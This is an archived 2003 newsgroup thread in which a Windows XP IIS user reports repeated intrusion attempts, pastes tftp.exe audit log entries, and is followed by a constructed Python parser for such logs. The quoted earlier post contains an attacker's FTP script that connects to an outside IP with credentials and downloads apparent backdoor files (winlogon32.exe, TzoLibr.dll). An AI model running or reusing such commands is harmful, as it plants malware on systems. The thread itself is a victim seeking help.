Re: Why does this keep happening...
From: Greg (greg_68@hotmail.com)
Date: 02/08/03
From: "Greg" <greg_68@hotmail.com> Date: Sat, 8 Feb 2003 11:53:42 -0700
In addition, here's what's showing up in my security log in the event
viewer:

Object Open:
  Object Server: Security
  Object Type: File
  Object Name: C:\WINDOWS\system32\tftp.exe
  Handle ID: -
  Operation ID: {0,17467710}
  Process ID: 184
  Image File Name: C:\WINDOWS\explorer.exe
  Primary User Name: Greg
  Primary Domain: DESKTOP
  Primary Logon ID: (0x0,0x10309)
  Client User Name: -
  Client Domain: -
  Client Logon ID: -
  Accesses: READ_CONTROL
            SYNCHRONIZE
            ReadData (or ListDirectory)
            ReadEA
            ReadAttributes
  Privileges: -
  Restricted Sid Count: 0

Object Open:
  Object Server: Security
  Object Type: File
  Object Name: C:\WINDOWS\system32\tftp.exe
  Handle ID: -
  Operation ID: {0,17467705}
  Process ID: 184
  Image File Name: C:\WINDOWS\explorer.exe
  Primary User Name: Greg
  Primary Domain: DESKTOP
  Primary Logon ID: (0x0,0x10309)
  Client User Name: -
  Client Domain: -
  Client Logon ID: -
  Accesses: SYNCHRONIZE
            Execute/Traverse
  Privileges: -
  Restricted Sid Count: 0

I have 36 of them in there right now from the last 20 minutes. The user
name 'Greg' is myself. Is there anything useful in that?
"Greg" <greg_68@hotmail.com> wrote in message
news:eyD7b$5zCHA.1628@TK2MSFTNGP10...
> I use IIS under Windows XP Professional for the Web server (development of
> web sites) on port 90 (my ISP blocks port 80 and people I know need to
> access the web server every now and then to see my work) and what's
> happening is somehow someone is trying to hack in. I have ALL of the
> Windows patches and there is no record of the hack in the web server logs.
> SMTP and FTP are disabled (I checked their log dirs too, just in case).
> This is happening at least a couple times each month from different people
> (different IP in the file they somehow upload and different things they want
> to upload). Here's the one I received today:
>
> open 68.104.136.245 1415
> user pierre sysop
> get servudaemon.ini
> get winlogon32.exe
> get TzoLibr.dll
> quit
>
> I removed all permissions for TFTP.EXE and FTP.EXE and set them both to
> audit success and failures, but it was blocked by my firewall anyway.
>
> What I want to know is, how exactly is this happening? I read that it's a
> security problem in IIS, which is why I'm posting this here, but I really
> don't understand how this is happening.
>
> I have both Norton AntiVirus (bought it last August) and the latest Norton
> Personal Firewall installed. Both automatically check and install updates
> several times a day so I believe them to be up-to-date.
>
> Can someone shed some light on this?
>
>
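
Added example (not part of Greg's post or of the thread): a small Python parser for "Object Open" audit records in the text layout shown above. It collects the multi-line Accesses list and counts, per requesting image, user and object, the opens that asked for Execute/Traverse rather than read-only rights. The third sample record, including its path and user, is made up for illustration.

```python
from collections import Counter

# Constructed sample: the first two records are abridged from the post; the
# third (other.exe) is made up so more than one requesting process appears.
SAMPLE = r"""Object Open:
Object Name: C:\WINDOWS\system32\tftp.exe
Image File Name: C:\WINDOWS\explorer.exe
Primary User Name: Greg
Accesses: READ_CONTROL
SYNCHRONIZE
ReadData (or ListDirectory)
Privileges: -
Object Open:
Object Name: C:\WINDOWS\system32\tftp.exe
Image File Name: C:\WINDOWS\explorer.exe
Primary User Name: Greg
Accesses: SYNCHRONIZE
Execute/Traverse
Privileges: -
Object Open:
Object Name: C:\WINDOWS\system32\tftp.exe
Image File Name: C:\EXAMPLE\other.exe
Primary User Name: SYSTEM
Accesses: SYNCHRONIZE
Execute/Traverse
Privileges: -
"""

def parse_events(text):
    """Split the text into records; 'Accesses' becomes a list of rights."""
    events, field = [], None
    for line in (l.strip() for l in text.splitlines()):
        if line == "Object Open:":
            events.append({"Accesses": []})
            field = None
        elif events and line:
            key, sep, value = line.partition(": ")
            if sep:                       # "Name: value" starts a new field
                field = key
                if key == "Accesses":
                    events[-1][key].append(value)
                else:
                    events[-1][key] = value
            elif field == "Accesses":     # bare line continues the rights list
                events[-1]["Accesses"].append(line)
    return events

def execute_requests(events):
    """Count Execute/Traverse opens per (requesting image, user, object)."""
    return Counter((e.get("Image File Name"), e.get("Primary User Name"), e.get("Object Name"))
                   for e in events if "Execute/Traverse" in e["Accesses"])
```

Grouping by Image File Name and Primary User Name separates opens made from the interactive desktop session from opens requested by any other process or account.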